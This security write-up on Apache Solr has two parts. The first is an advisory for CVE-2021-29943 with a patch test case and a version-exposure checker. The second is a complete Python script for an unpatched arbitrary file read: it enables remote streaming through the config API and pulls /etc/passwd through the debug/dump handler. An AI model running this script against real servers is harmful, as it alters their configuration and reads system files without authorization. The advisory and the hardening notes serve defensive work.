## CVE-2021-29943: Collection read/write vulnerability
When a Hadoop cluster uses ConfigurableInternodeAuthHadoopPlugin for authentication, Apache Solr versions before 8.8.2 forward/proxy distributed requests with the server's own credentials instead of the original client's credentials.
This causes authorization to be resolved incorrectly on the receiving host, so an unauthorized attacker can exploit the server-side misresolution to read and write collections.

### Severity: High

### Affected versions: 7.0.0 to 7.7.3, 8.0.0 to 8.8.1
### POC
Analysing the patch, the POC can be taken from its test case: in effect, an ordinary request to the /admin/authorization endpoint allows collection read/write without authorization.
```java
// Excerpt from the test case added by the SOLR-15233 patch; the fields
// shouldRestorePerms, cluster and collectionName belong to the enclosing test class.
@After
@Override
public void tearDown() throws Exception {
  if (shouldRestorePerms) {
    // Restore the admin:read permission that the test deleted.
    String command = "{ set-permission: { name: read, role: admin, before: 2 } }";
    GenericSolrRequest req = new GenericSolrRequest(SolrRequest.METHOD.POST, "/admin/authorization", new ModifiableSolrParams());
    req.setContentWriter(new RequestWriter.StringPayloadContentWriter(command, "application/json"));
    req.process(cluster.getSolrClient());
  }
  super.tearDown();
}

@Test
public void testUnauthorized() throws IOException, SolrServerException {
  // Update the permissions to remove admin:read authz
  String command = "{ delete-permission: 1 }";
  GenericSolrRequest req = new GenericSolrRequest(SolrRequest.METHOD.POST, "/admin/authorization", new ModifiableSolrParams());
  req.setContentWriter(new RequestWriter.StringPayloadContentWriter(command, "application/json"));
  req.process(cluster.getSolrClient());
  shouldRestorePerms = true;

  // Try against each node: without admin:read, every node must reject the query with 403.
  // A vulnerable build resolves the forwarded request with the server's credentials and lets it through.
  for (JettySolrRunner jsr : cluster.getJettySolrRunners()) {
    try (SolrClient client = new HttpSolrClient.Builder().withBaseSolrUrl(jsr.getBaseUrl().toString()).build()) {
      BaseHttpSolrClient.RemoteSolrException e = assertThrows(BaseHttpSolrClient.RemoteSolrException.class,
          () -> client.query(collectionName, new SolrQuery("*:*")));
      assertEquals(403, e.code());
    }
  }
}
```
### Fix:
Upgrade to version 8.8.2, or apply the patch: https://issues.apache.org/jira/secure/attachment/13023260/0001-SOLR-15233-Add-negative-test-case-for-KRB-Authz.patch
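To decide whether a node actually needs the upgrade above, the following added example (not code from the original post or from Apache Solr) checks a node's reported version against the affected ranges and whether ConfigurableInternodeAuthHadoopPlugin is the configured authentication class. The two JSON documents are constructed samples; the response shapes of /solr/admin/info/system and /solr/admin/authentication are assumptions.

```python
"""Exposure check for CVE-2021-29943 from a Solr node's own JSON responses."""
import json

# Affected ranges from the advisory: 7.0.0-7.7.3 and 8.0.0-8.8.1 (inclusive).
AFFECTED_RANGES = [((7, 0, 0), (7, 7, 3)), ((8, 0, 0), (8, 8, 1))]
VULNERABLE_PLUGIN = "ConfigurableInternodeAuthHadoopPlugin"


def parse_version(text):
    """'8.8.1' or '8.8.1-SNAPSHOT' -> (8, 8, 1); missing components pad to 0."""
    core = text.split("-")[0].split(" ")[0]
    parts = [int(p) for p in core.split(".") if p.isdigit()]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def version_affected(text):
    """True if the version lies inside one of the affected ranges."""
    v = parse_version(text)
    return any(lo <= v <= hi for lo, hi in AFFECTED_RANGES)


def uses_hadoop_internode_auth(authn_json):
    """True if the configured authentication class is the affected plugin.
    Accepts both the 'solr.' shorthand and the fully qualified class name."""
    cls = authn_json.get("authentication", {}).get("class", "")
    return cls.split(".")[-1] == VULNERABLE_PLUGIN


def assess(system_json, authn_json):
    """Return (affected_version, plugin_in_use, exposed); exposed needs both."""
    ver = version_affected(system_json["lucene"]["solr-spec-version"])
    plugin = uses_hadoop_internode_auth(authn_json)
    return ver, plugin, ver and plugin


# Constructed samples (assumed response shapes, not captured from a real server).
SYSTEM_SAMPLE = json.loads('{"lucene": {"solr-spec-version": "8.8.1"}}')
AUTHN_SAMPLE = json.loads(
    '{"authentication": {"class": "solr.ConfigurableInternodeAuthHadoopPlugin"}}')

if __name__ == "__main__":
    print(assess(SYSTEM_SAMPLE, AUTHN_SAMPLE))
```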

### References:
– https://github.com/apache/solr-site/blob/a8632c75e40af6694a7ed29996c90b6b7fcf01bf/content/solr/security/2021-04-12-cve-2021-29943.md

## POC

solr_2021-03-18.py
```python
#!/usr/bin/python3
# coding: UTF-8
# Vulnerability title: Solr latest version arbitrary file read 0day
# Reference article: https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ
# Vulnerability lifecycle: 0day, not fixed by the vendor
# Hardening: tighten access control, set strong passwords, block access from the internet

import sys
import requests

# The original script hard-coded a single public IP as the target; the base URL of the
# instance being assessed is taken from the command line here instead.
if len(sys.argv) != 2:
    sys.exit("usage: solr_2021-03-18.py http://<solr-host>:8983/")
host = sys.argv[1].rstrip("/")


def get_core(host):
    # List the cores (without index statistics) and take the first one.
    url = host + "/solr/admin/cores?indexInfo=false&wt=json"
    core_data = requests.get(url, timeout=3).json()

    if core_data["status"]:
        core = list(core_data["status"].keys())[0]  # dict keys are not indexable in Python 3
        # print(core)
        # Turn on remote streaming in the core's config so that stream.url is honoured.
        jsonp_data = {"set-property": {"requestDispatcher.requestParsers.enableRemoteStreaming": "true"}}
        requests.post(url=host + "/solr/%s/config" % core, json=jsonp_data)

        # The debug/dump handler echoes the content stream, which stream.url points at a local file.
        result_text = requests.post(url=host + "/solr/%s/debug/dump?param=ContentStreams" % core,
                                    data={"stream.url": "file:///etc/passwd"})
        result_text = result_text.text  # decode the body so the substring check works in Python 3

        if "root:x:0:0:root:/root:/bin/bash" in result_text:
            print(host + " is vulnerable")
            print(result_text)
        else:
            sys.exit("Not vulnerable")


get_core(host)
```
